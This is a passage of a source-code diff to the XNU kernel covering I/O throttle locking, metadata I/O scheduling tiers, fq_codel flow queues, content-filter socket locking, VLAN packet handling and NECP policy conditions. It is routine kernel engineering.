- lck_mtx_destroy(&info->throttle_lock, throttle_lock_grp); + lck_mtx_destroy(&info->throttle_lock, &throttle_lock_grp); FREE(info, M_TEMP); } return oldValue; @@ -1412,24 +1414,14 @@ throttle_init(void) #if CONFIG_IOSCHED int iosched; #endif - /* - * allocate lock group attribute and group - */ - throttle_lock_grp_attr = lck_grp_attr_alloc_init(); - throttle_lock_grp = lck_grp_alloc_init("throttle I/O", throttle_lock_grp_attr); /* Update throttle parameters based on device tree configuration */ throttle_init_throttle_window(); - /* - * allocate the lock attribute - */ - throttle_lock_attr = lck_attr_alloc_init(); - for (i = 0; i < LOWPRI_MAX_NUM_DEV; i++) { info = &_throttle_io_info[i]; - lck_mtx_init(&info->throttle_lock, throttle_lock_grp, throttle_lock_attr); + lck_mtx_init(&info->throttle_lock, &throttle_lock_grp, LCK_ATTR_NULL); info->throttle_timer_call = thread_call_allocate((thread_call_func_t)throttle_timer, (thread_call_param_t)info); for (level = 0; level <= THROTTLE_LEVEL_END; level++) { @@ -1547,7 +1539,7 @@ throttle_info_create(void) DEBUG_ALLOC_THROTTLE_INFO("Creating info = %p\n", info, info ); info->throttle_alloc = TRUE; - lck_mtx_init(&info->throttle_lock, throttle_lock_grp, throttle_lock_attr); + lck_mtx_init(&info->throttle_lock, &throttle_lock_grp, LCK_ATTR_NULL); info->throttle_timer_call = thread_call_allocate((thread_call_func_t)throttle_timer, (thread_call_param_t)info); for (level = 0; level <= THROTTLE_LEVEL_END; level++) { @@ -2127,6 +2119,12 @@ throttle_get_thread_effective_io_policy() return proc_get_effective_thread_policy(current_thread(), TASK_POLICY_IO); } +int +throttle_thread_io_tier_above_metadata(void) +{ + return throttle_get_thread_effective_io_policy() < IOSCHED_METADATA_TIER; +} + void throttle_info_reset_window(uthread_t ut) { @@ -2515,20 +2513,27 @@ spec_strategy(struct vnop_strategy_args *ap) #if CONFIG_IOSCHED /* - * For I/O Scheduling, we currently do not have a way to track and expedite metadata I/Os. - * To ensure we dont get into priority inversions due to metadata I/Os, we use the following rules: - * For metadata reads, ceil all I/Os to IOSCHED_METADATA_TIER & mark them passive if the I/O tier was upgraded - * For metadata writes, unconditionally mark them as IOSCHED_METADATA_TIER and passive + * For metadata reads, ceil the I/O tier to IOSCHED_METADATA_EXPEDITED_TIER if they are expedited, otherwise + * ceil it to IOSCHED_METADATA_TIER. Mark them passive if the I/O tier was upgraded. + * For metadata writes, set the I/O tier to IOSCHED_METADATA_EXPEDITED_TIER if they are expedited. Otherwise + * set it to IOSCHED_METADATA_TIER. In addition, mark them as passive. */ if (bap->ba_flags & BA_META) { if ((mp && (mp->mnt_ioflags & MNT_IOFLAGS_IOSCHED_SUPPORTED)) || (bap->ba_flags & BA_IO_SCHEDULED)) { if (bp->b_flags & B_READ) { - if (io_tier > IOSCHED_METADATA_TIER) { + if ((bap->ba_flags & BA_EXPEDITED_META_IO) && (io_tier > IOSCHED_METADATA_EXPEDITED_TIER)) { + io_tier = IOSCHED_METADATA_EXPEDITED_TIER; + passive = 1; + } else if (io_tier > IOSCHED_METADATA_TIER) { io_tier = IOSCHED_METADATA_TIER; passive = 1; } } else { - io_tier = IOSCHED_METADATA_TIER; + if (bap->ba_flags & BA_EXPEDITED_META_IO) { + io_tier = IOSCHED_METADATA_EXPEDITED_TIER; + } else { + io_tier = IOSCHED_METADATA_TIER; + } passive = 1; } } @@ -2591,6 +2596,9 @@ spec_strategy(struct vnop_strategy_args *ap) buf_kernel_addrperm_addr(bp), bdev, buf_blkno(bp), buf_count(bp), 0); } +#if CONFIG_IO_COMPRESSION_STATS + io_compression_stats(bp); +#endif /* CONFIG_IO_COMPRESSION_STATS */ thread_update_io_stats(current_thread(), buf_count(bp), code); if (mp != NULL) { diff --git a/bsd/net/classq/classq.h b/bsd/net/classq/classq.h index 1ec52efea..a3cd15205 100644 --- a/bsd/net/classq/classq.h +++ b/bsd/net/classq/classq.h @@ -93,6 +93,11 @@ typedef struct classq_pkt { #define CLASSQ_PKT_INITIALIZER(_p) \ (classq_pkt_t){ .cp_mbuf = NULL, .cp_ptype = QP_INVALID } +#define CLASSQ_PKT_INIT(_p) do { \ + (_p)->cp_ptype = QP_INVALID; \ + (_p)->cp_mbuf = NULL; \ +} while (0) + #define CLASSQ_PKT_INIT_MBUF(_p, _m) do { \ (_p)->cp_ptype = QP_MBUF; \ (_p)->cp_mbuf = (_m); \ @@ -183,6 +188,9 @@ typedef struct _class_queue_ { #define CLASSQF_ECN (CLASSQF_ECN4 | CLASSQF_ECN6) extern u_int32_t classq_verbose; +#if DEBUG || DEVELOPMENT +extern uint16_t fq_codel_quantum; +#endif /* DEBUG || DEVELOPMENT */ SYSCTL_DECL(_net_classq); diff --git a/bsd/net/classq/classq_fq_codel.c b/bsd/net/classq/classq_fq_codel.c index f587e7689..e78ceefdf 100644 --- a/bsd/net/classq/classq_fq_codel.c +++ b/bsd/net/classq/classq_fq_codel.c @@ -97,12 +97,16 @@ fq_alloc(classq_pkt_type_t ptype) if (ptype == QP_MBUF) { MBUFQ_INIT(&fq->fq_mbufq); } + CLASSQ_PKT_INIT(&fq->fq_dq_head); + CLASSQ_PKT_INIT(&fq->fq_dq_tail); + fq->fq_in_dqlist = false; return fq; } void fq_destroy(fq_t *fq) { + VERIFY(fq->fq_flags & FQF_DESTROYED); VERIFY(fq_empty(fq)); VERIFY(!(fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW))); VERIFY(fq->fq_bytes == 0); @@ -127,6 +131,10 @@ fq_detect_dequeue_stall(fq_if_t *fqs, fq_t *flowq, fq_if_classq_t *fq_cl, */ FQ_SET_DELAY_HIGH(flowq); fq_cl->fcl_stat.fcl_dequeue_stall++; + os_log_error(OS_LOG_DEFAULT, "%s: dequeue stall num: %d, " + "scidx: %d, flow: 0x%x, iface: %s", __func__, + fq_cl->fcl_stat.fcl_dequeue_stall, flowq->fq_sc_index, + flowq->fq_flowhash, if_name(fqs->fqs_ifq->ifcq_ifp)); } } @@ -314,8 +322,7 @@ fq_addq(fq_if_t *fqs, pktsched_pkt_t *pkt, fq_if_classq_t *fq_cl) /* Set the return code correctly */ if (__improbable(fc_adv == 1 && droptype != DTYPE_FORCED)) { - if (fq_if_add_fcentry(fqs, pkt, pkt_flowid, pkt_flowsrc, - fq_cl)) { + if (fq_if_add_fcentry(fqs, pkt, pkt_flowsrc, fq, fq_cl)) { fq->fq_flags |= FQF_FLOWCTL_ON; /* deliver flow control advisory error */ if (droptype == DTYPE_NODROP) { @@ -375,7 +382,7 @@ fq_addq(fq_if_t *fqs, pktsched_pkt_t *pkt, fq_if_classq_t *fq_cl) */ if (fq_empty(fq) && !(fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW))) { - fq_if_destroy_flow(fqs, fq_cl, fq); + fq_if_destroy_flow(fqs, fq_cl, fq, true); fq = NULL; } } else { @@ -509,6 +516,11 @@ fq_getq_flow(fq_if_t *fqs, fq_t *fq, pktsched_pkt_t *pkt) if (fq->fq_min_qdelay > fqs->fqs_target_qdelay) { if (!FQ_IS_DELAYHIGH(fq)) { FQ_SET_DELAY_HIGH(fq); + os_log_error(OS_LOG_DEFAULT, + "%s: high delay idx: %d, %llu, flow: 0x%x, " + "iface: %s", __func__, fq->fq_sc_index, + fq->fq_min_qdelay, fq->fq_flowhash, + if_name(fqs->fqs_ifq->ifcq_ifp)); } } else { FQ_CLEAR_DELAY_HIGH(fq); diff --git a/bsd/net/classq/classq_fq_codel.h b/bsd/net/classq/classq_fq_codel.h index b8c4d10be..e2f0114f1 100644 --- a/bsd/net/classq/classq_fq_codel.h +++ b/bsd/net/classq/classq_fq_codel.h @@ -57,9 +57,10 @@ typedef struct flowq { #define FQF_NEW_FLOW 0x04 /* Currently on new flows queue */ #define FQF_OLD_FLOW 0x08 /* Currently on old flows queue */ #define FQF_FLOWCTL_ON 0x10 /* Currently flow controlled */ +#define FQF_DESTROYED 0x80 /* flowq destroyed */ uint8_t fq_flags; /* flags */ uint8_t fq_sc_index; /* service_class index */ - int16_t fq_deficit; /* Deficit for scheduling */ + int32_t fq_deficit; /* Deficit for scheduling */ uint32_t fq_bytes; /* Number of bytes in the queue */ uint64_t fq_min_qdelay; /* min queue delay for Codel */ uint64_t fq_updatetime; /* next update interval */ @@ -68,6 +69,11 @@ typedef struct flowq { STAILQ_ENTRY(flowq) fq_actlink; /* for new/old flow queues */ uint32_t fq_flowhash; /* Flow hash */ classq_pkt_type_t fq_ptype; /* Packet type */ + /* temporary packet queue for dequeued packets */ + classq_pkt_t fq_dq_head; + classq_pkt_t fq_dq_tail; + STAILQ_ENTRY(flowq) fq_dqlink; /* entry on dequeue flow list */ + bool fq_in_dqlist; } fq_t; #define fq_mbufq __fq_pktq_u.__mbufq diff --git a/bsd/net/classq/classq_subr.c b/bsd/net/classq/classq_subr.c index d18e9c767..d35cf2fa0 100644 --- a/bsd/net/classq/classq_subr.c +++ b/bsd/net/classq/classq_subr.c @@ -64,13 +64,29 @@ SYSCTL_QUAD(_net_classq, OID_AUTO, update_interval, CTLFLAG_RW | CTLFLAG_LOCKED, &ifclassq_update_interval, "update interval in nanoseconds"); +#if DEBUG || DEVELOPMENT +uint32_t ifclassq_flow_control_adv = 1; /* flow control advisory */ +SYSCTL_UINT(_net_classq, OID_AUTO, flow_control_adv, + CTLFLAG_RW | CTLFLAG_LOCKED, &ifclassq_flow_control_adv, 1, + "enable/disable flow control advisory"); + +uint16_t fq_codel_quantum = 0; +#endif /* DEBUG || DEVELOPMENT */ + void classq_init(void) { _CASSERT(MBUF_TC_BE == 0); _CASSERT(MBUF_SC_BE == 0); _CASSERT(IFCQ_SC_MAX == MBUF_SC_MAX_CLASSES); - +#if DEBUG || DEVELOPMENT + PE_parse_boot_argn("fq_codel_quantum", &fq_codel_quantum, + sizeof(fq_codel_quantum)); + PE_parse_boot_argn("ifclassq_target_qdelay", &ifclassq_target_qdelay, + sizeof(ifclassq_target_qdelay)); + PE_parse_boot_argn("ifclassq_update_interval", + &ifclassq_update_interval, sizeof(ifclassq_update_interval)); +#endif /* DEBUG || DEVELOPMENT */ fq_codel_init(); } diff --git a/bsd/net/classq/if_classq.h b/bsd/net/classq/if_classq.h index 15e6b6bb4..51f7993da 100644 --- a/bsd/net/classq/if_classq.h +++ b/bsd/net/classq/if_classq.h @@ -100,6 +100,10 @@ struct ifclassq; enum cqdq_op; enum cqrq; +#if DEBUG || DEVELOPMENT +extern uint32_t ifclassq_flow_control_adv; +#endif /* DEBUG || DEVELOPMENT */ + typedef int (*ifclassq_enq_func)(struct ifclassq *, classq_pkt_t *, boolean_t *); typedef void (*ifclassq_deq_func)(struct ifclassq *, classq_pkt_t *); diff --git a/bsd/net/content_filter.c b/bsd/net/content_filter.c index 7617e7757..e33a2a408 100644 --- a/bsd/net/content_filter.c +++ b/bsd/net/content_filter.c @@ -1605,45 +1605,39 @@ cfil_sock_id_from_socket(struct socket *so) } } -static bool -cfil_socket_safe_lock(struct inpcb *inp) -{ - if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) != WNT_STOPUSING) { - socket_lock(inp->inp_socket, 1); - if (in_pcb_checkstate(inp, WNT_RELEASE, 1) != WNT_STOPUSING) { - return true; - } - socket_unlock(inp->inp_socket, 1); - } - return false; -} - /* - * cfil_socket_safe_lock_rip - - * This routine attempts to lock the rip socket safely. - * The passed in ripcbinfo is assumed to be locked and must be unlocked (regardless - * of success/failure) before calling socket_unlock(). This is to avoid double - * locking since rip_unlock() will lock ripcbinfo if it needs to dispose inpcb when + * cfil_socket_safe_lock - + * This routine attempts to lock the socket safely. + * + * The passed in pcbinfo is assumed to be locked and must be unlocked once the + * inp state is safeguarded and before we attempt to lock/unlock the socket. + * This is to prevent getting blocked by socket_lock() while holding the pcbinfo + * lock, avoiding potential deadlock with other processes contending for the same + * resources. This is also to avoid double locking the pcbinfo for rip sockets + * since rip_unlock() will lock ripcbinfo if it needs to dispose inpcb when * so_usecount is 0. */ static bool -cfil_socket_safe_lock_rip(struct inpcb *inp, struct inpcbinfo *pcbinfo) +cfil_socket_safe_lock(struct inpcb *inp, struct inpcbinfo *pcbinfo) { struct socket *so = NULL; VERIFY(pcbinfo != NULL); if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) != WNT_STOPUSING) { + // Safeguarded the inp state, unlock pcbinfo before locking socket. + lck_rw_done(pcbinfo->ipi_lock); + so = inp->inp_socket; socket_lock(so, 1); if (in_pcb_checkstate(inp, WNT_RELEASE, 1) != WNT_STOPUSING) { - lck_rw_done(pcbinfo->ipi_lock); return true; } + } else { + // Failed to safeguarded the inp state, unlock pcbinfo and abort. + lck_rw_done(pcbinfo->ipi_lock); } - lck_rw_done(pcbinfo->ipi_lock); - if (so) { socket_unlock(so, 1); } @@ -1675,10 +1669,11 @@ cfil_socket_from_sock_id(cfil_sock_id_t cfil_sock_id, bool udp_only) inp->inp_flowhash == flowhash && (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt && inp->inp_socket->so_cfil != NULL) { - if (cfil_socket_safe_lock(inp)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } - break; + /* pcbinfo is already unlocked, we are done. */ + goto done; } } lck_rw_done(pcbinfo->ipi_lock); @@ -1695,10 +1690,11 @@ find_udp: inp->inp_socket != NULL && inp->inp_socket->so_cfil_db != NULL && (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt) { - if (cfil_socket_safe_lock(inp)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } - break; + /* pcbinfo is already unlocked, we are done. */ + goto done; } } lck_rw_done(pcbinfo->ipi_lock); @@ -1713,7 +1709,7 @@ find_udp: inp->inp_socket != NULL && inp->inp_socket->so_cfil_db != NULL && (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt) { - if (cfil_socket_safe_lock_rip(inp, pcbinfo)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } /* pcbinfo is already unlocked, we are done. */ @@ -1746,10 +1742,11 @@ cfil_socket_from_client_uuid(uuid_t necp_client_uuid, bool *cfil_attached) inp->inp_socket != NULL && uuid_compare(inp->necp_client_uuid, necp_client_uuid) == 0) { *cfil_attached = (inp->inp_socket->so_cfil != NULL); - if (cfil_socket_safe_lock(inp)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } - break; + /* pcbinfo is already unlocked, we are done. */ + goto done; } } lck_rw_done(pcbinfo->ipi_lock); @@ -1764,10 +1761,11 @@ cfil_socket_from_client_uuid(uuid_t necp_client_uuid, bool *cfil_attached) inp->inp_socket != NULL && uuid_compare(inp->necp_client_uuid, necp_client_uuid) == 0) { *cfil_attached = (inp->inp_socket->so_cfil_db != NULL); - if (cfil_socket_safe_lock(inp)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } - break; + /* pcbinfo is already unlocked, we are done. */ + goto done; } } lck_rw_done(pcbinfo->ipi_lock); @@ -4265,6 +4263,7 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3 struct cfil_entry *entry; struct cfe_buf *entrybuf; struct cfil_queue *pending_q; + struct cfil_entry *iter_entry = NULL; CFIL_LOG(LOG_INFO, "so %llx kcunit %u outgoing %d", (uint64_t)VM_KERNEL_ADDRPERM(so), kcunit, outgoing); @@ -4282,13 +4281,25 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3 passlen = entrybuf->cfe_pass_offset - pending_q->q_start; + if (cfil_queue_empty(pending_q)) { + for (iter_entry = SLIST_NEXT(entry, cfe_order_link); + iter_entry != NULL; + iter_entry = SLIST_NEXT(iter_entry, cfe_order_link)) { + error = cfil_data_service_ctl_q(so, cfil_info, CFI_ENTRY_KCUNIT(cfil_info, iter_entry), outgoing); + /* 0 means passed so we can continue */ + if (error != 0) { + break; + } + } + goto done; + } + /* * Locate the chunks of data that we can pass to the next filter * A data chunk must be on mbuf boundaries */ curlen = 0; while ((data = cfil_queue_first(pending_q)) != NULL) { - struct cfil_entry *iter_entry; datalen = cfil_data_length(data, NULL, NULL); #if DATA_DEBUG @@ -4334,6 +4345,7 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3 } } +done: CFIL_INFO_VERIFY(cfil_info); return error; @@ -7194,6 +7206,13 @@ cfil_info_udp_expire(void *v, wait_result_t w) cfil_info_log(LOG_ERR, cfil_info, "CFIL: LIFECYCLE: GC CLEAN UP"); #endif + for (int kcunit = 1; kcunit <= MAX_CONTENT_FILTER; kcunit++) { + /* Let the filters know of the closing */ + if (cfil_dispatch_closed_event(so, cfil_info, kcunit) != 0) { + goto unlock; + } + } + cfil_db_delete_entry(db, hash_entry); CFIL_INFO_FREE(cfil_info); OSIncrementAtomic(&cfil_stats.cfs_sock_detached); diff --git a/bsd/net/dlil.c b/bsd/net/dlil.c index b58785c17..da376cb11 100644 --- a/bsd/net/dlil.c +++ b/bsd/net/dlil.c @@ -4838,7 +4838,19 @@ skip_clat: } goto next; } - if ((m->m_flags & M_PROMISC) != 0) { + /* + * A VLAN interface receives VLAN-tagged packets by attaching + * its PF_VLAN protocol to a parent interface. When a VLAN + * interface is a member of a bridge, the parent interface + * receives VLAN-tagged M_PROMISC packets. A VLAN-tagged + * M_PROMISC packet must be processed by the VLAN protocol + * so that it can be sent up the stack via + * dlil_input_packet_list(). That allows the bridge interface's + * input filter, attached to the VLAN interface, to process + * the packet. + */ + if (protocol_family != PF_VLAN && + (m->m_flags & M_PROMISC) != 0) { m_freem(m); goto next; } @@ -5319,8 +5331,7 @@ preout_again: if ((raw != 0) && (ifp->if_family == IFNET_FAMILY_ETHERNET)) { uint8_t vlan_encap_len = 0; - if ((old_proto_family == PF_VLAN) && - ((m->m_pkthdr.csum_flags & CSUM_VLAN_TAG_VALID) == 0)) { + if ((m->m_pkthdr.csum_flags & CSUM_VLAN_ENCAP_PRESENT) != 0) { vlan_encap_len = ETHER_VLAN_ENCAP_LEN; } m->m_pkthdr.pkt_hdr = mtod(m, char *) + ETHER_HDR_LEN + vlan_encap_len; diff --git a/bsd/net/if_vlan.c b/bsd/net/if_vlan.c index 7cba0957a..5001ef7d0 100644 --- a/bsd/net/if_vlan.c +++ b/bsd/net/if_vlan.c @@ -1137,6 +1137,7 @@ vlan_output(struct ifnet * ifp, struct mbuf * m) m->m_pkthdr.csum_tx_start += ETHER_VLAN_ENCAP_LEN; m->m_pkthdr.csum_tx_stuff += ETHER_VLAN_ENCAP_LEN; } + m->m_pkthdr.csum_flags |= CSUM_VLAN_ENCAP_PRESENT; } err = dlil_output(p, PF_VLAN, m, NULL, NULL, 1, &adv); diff --git a/bsd/net/kext_net.h b/bsd/net/kext_net.h index c8a364c86..9914747df 100644 --- a/bsd/net/kext_net.h +++ b/bsd/net/kext_net.h @@ -49,7 +49,6 @@ struct sockopt; struct inpcb; /* Private, internal implementation functions */ -extern void sflt_init(void); extern int sflt_permission_check(struct inpcb *inp); extern void sflt_initsock(struct socket *so); extern void sflt_termsock(struct socket *so); diff --git a/bsd/net/necp.c b/bsd/net/necp.c index a06dc3914..9948ac719 100644 --- a/bsd/net/necp.c +++ b/bsd/net/necp.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2013-2020 Apple Inc. All rights reserved. + * Copyright (c) 2013-2021 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -67,6 +67,7 @@ #include #include #include +#include #include #include #include @@ -141,16 +142,7 @@ u_int32_t necp_drop_all_order = 0; u_int32_t necp_drop_all_level = 0; -#define NECP_LOOPBACK_PASS_ALL 1 // Pass all loopback traffic -#define NECP_LOOPBACK_PASS_WITH_FILTER 2 // Pass all loopback traffic, but activate content filter and/or flow divert if applicable - -#if defined(XNU_TARGET_OS_OSX) -#define NECP_LOOPBACK_PASS_DEFAULT NECP_LOOPBACK_PASS_WITH_FILTER -#else -#define NECP_LOOPBACK_PASS_DEFAULT NECP_LOOPBACK_PASS_ALL -#endif - -u_int32_t necp_pass_loopback = NECP_LOOPBACK_PASS_DEFAULT; +u_int32_t necp_pass_loopback = NECP_LOOPBACK_PASS_ALL; u_int32_t necp_pass_keepalives = 1; // 0=Off, 1=On u_int32_t necp_pass_interpose = 1; // 0=Off, 1=On u_int32_t necp_restrict_multicast = 1; // 0=Off, 1=On @@ -251,6 +243,7 @@ ZONE_DECLARE(necp_ip_policy_zone, "necp_ip_policy", #define NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER 0x10000000 #define NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS 0x20000000 #define NECP_KERNEL_CONDITION_IS_LOOPBACK 0x40000000 +#define NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY 0x80000000 #define NECP_MAX_POLICY_RESULT_SIZE 512 #define NECP_MAX_ROUTE_RULES_ARRAY_SIZE 1024 @@ -301,6 +294,7 @@ static TAILQ_HEAD(_necp_session_list, necp_session) necp_session_list; struct necp_socket_info { pid_t pid; + int32_t pid_version; uid_t uid; union necp_sockaddr_union local_addr; union necp_sockaddr_union remote_addr; @@ -318,7 +312,9 @@ struct necp_socket_info { unsigned is_platform_binary : 1; unsigned used_responsible_pid : 1; unsigned is_loopback : 1; - unsigned __pad_bits : 4; + unsigned real_is_platform_binary : 1; + unsigned is_delegated : 1; + unsigned __pad_bits : 6; }; static lck_grp_attr_t *necp_kernel_policy_grp_attr = NULL; @@ -409,7 +405,7 @@ static bool necp_policy_mark_all_for_deletion(struct necp_session *session); static bool necp_policy_delete(struct necp_session *session, struct necp_session_policy *policy); static void necp_policy_apply_all(struct necp_session *session); -static necp_kernel_policy_id necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *domain, pid_t cond_pid, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter); +static necp_kernel_policy_id necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *domain, pid_t cond_pid, int32_t cond_pidversion, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter); static bool necp_kernel_socket_policy_delete(necp_kernel_policy_id policy_id); static bool necp_kernel_socket_policies_reprocess(void); static bool necp_kernel_socket_policies_update_uuid_table(void); @@ -450,6 +446,7 @@ static struct necp_uuid_id_mapping *necp_uuid_lookup_service_id_locked(uuid_t uu static struct necp_uuid_id_mapping *necp_uuid_lookup_uuid_with_service_id_locked(u_int32_t local_id); static u_int32_t necp_create_uuid_service_id_mapping(uuid_t uuid); static bool necp_remove_uuid_service_id_mapping(uuid_t uuid); +static bool necp_remove_uuid_service_id_mapping_with_service_id(u_int32_t service_id); struct necp_string_id_mapping { LIST_ENTRY(necp_string_id_mapping) chain; @@ -479,7 +476,8 @@ static bool necp_update_qos_marking(struct ifnet *ifp, u_int32_t route_rule_id); struct necp_route_rule { LIST_ENTRY(necp_route_rule) chain; u_int32_t id; - u_int32_t default_action; + u_int32_t netagent_id; + u_int8_t default_action; u_int8_t cellular_action; u_int8_t wifi_action; u_int8_t wired_action; @@ -493,6 +491,7 @@ static LIST_HEAD(necp_route_rule_list, necp_route_rule) necp_route_rules; static u_int32_t necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_array, u_int32_t route_rules_array_size); static bool necp_remove_route_rule(struct necp_route_rule_list *list, u_int32_t route_rule_id); static bool necp_route_is_allowed(struct rtentry *route, ifnet_t interface, u_int32_t route_rule_id, u_int32_t *interface_type_denied); +static uint32_t necp_route_get_netagent(struct rtentry *route, u_int32_t route_rule_id); static struct necp_route_rule *necp_lookup_route_rule_locked(struct necp_route_rule_list *list, u_int32_t route_rule_id); static inline void necp_get_parent_cred_result(proc_t proc, struct necp_socket_info *info); @@ -2097,6 +2096,10 @@ necp_policy_condition_is_valid(u_int8_t *buffer, u_int32_t length, u_int8_t poli validated = TRUE; break; } + case NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY: { + validated = TRUE; + break; + } default: { validated = FALSE; break; @@ -2139,6 +2142,11 @@ necp_policy_route_rule_is_valid(u_int8_t *buffer, u_int32_t length) validated = TRUE; break; } + case NECP_ROUTE_RULE_USE_NETAGENT: { + u_int32_t rule_length = necp_policy_condition_get_value_length_from_buffer(buffer, length); + validated = (rule_length >= sizeof(uuid_t)); + break; + } default: { validated = FALSE; break; @@ -2686,7 +2694,7 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length) num_conditions++; } if (condition_mask & NECP_KERNEL_CONDITION_PID) { - condition_tlv_length += sizeof(pid_t); + condition_tlv_length += (sizeof(pid_t) + sizeof(int32_t)); num_conditions++; } if (condition_mask & NECP_KERNEL_CONDITION_UID) { @@ -2757,6 +2765,9 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length) if (condition_mask & NECP_KERNEL_CONDITION_IS_LOOPBACK) { num_conditions++; } + if (condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) { + num_conditions++; + } } condition_tlv_length += num_conditions * (sizeof(u_int8_t) + sizeof(u_int32_t)); // These are for the condition TLVs. The space for "value" is already accounted for above. @@ -2838,7 +2849,10 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length) } } if (condition_mask & NECP_KERNEL_CONDITION_PID) { - cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_PID, sizeof(policy->cond_pid), &policy->cond_pid, + uint8_t pid_buffer[sizeof(policy->cond_pid) + sizeof(policy->cond_pid_version)] = { }; + memcpy(pid_buffer, &policy->cond_pid, sizeof(policy->cond_pid)); + memcpy(pid_buffer + sizeof(policy->cond_pid), &policy->cond_pid_version, sizeof(policy->cond_pid_version)); + cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_PID, sizeof(pid_buffer), &pid_buffer, cond_buf, condition_tlv_length); } if (condition_mask & NECP_KERNEL_CONDITION_UID) { @@ -2919,6 +2933,9 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length) if (condition_mask & NECP_KERNEL_CONDITION_IS_LOOPBACK) { cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_FLOW_IS_LOOPBACK, 0, "", cond_buf, condition_tlv_length); } + if (condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) { + cond_buf_cursor = necp_buffer_write_tlv(cond_buf_cursor, NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY, 0, "", cond_buf, condition_tlv_length); + } } cursor = necp_buffer_write_tlv(cursor, NECP_TLV_POLICY_CONDITION, cond_buf_cursor - cond_buf, cond_buf, tlv_buffer, total_allocated_bytes); @@ -3239,6 +3256,7 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli char *cond_custom_entitlement = NULL; char *cond_signing_identifier = NULL; pid_t cond_pid = 0; + int32_t cond_pid_version = 0; uid_t cond_uid = 0; necp_app_id cond_app_id = 0; necp_app_id cond_real_app_id = 0; @@ -3407,6 +3425,9 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli master_condition_negated_mask |= NECP_KERNEL_CONDITION_PID; } memcpy(&cond_pid, condition_value, sizeof(cond_pid)); + if (condition_length >= (sizeof(pid_t) + sizeof(cond_pid_version))) { + memcpy(&cond_pid_version, (condition_value + sizeof(pid_t)), sizeof(cond_pid_version)); + } socket_only_conditions = TRUE; } break; @@ -3631,6 +3652,14 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli socket_only_conditions = TRUE; break; } + case NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY: { + master_condition_mask |= NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY; + if (condition_is_negative) { + master_condition_negated_mask |= NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY; + } + socket_only_conditions = TRUE; + break; + } default: { break; } @@ -3817,7 +3846,7 @@ necp_policy_apply(struct necp_session *session, struct necp_session_policy *poli } if (socket_layer_non_id_conditions) { - necp_kernel_policy_id policy_id = necp_kernel_socket_policy_add(policy->order, session->session_order, session->proc_pid, master_condition_mask, master_condition_negated_mask, cond_app_id, cond_real_app_id, cond_custom_entitlement, cond_account_id, 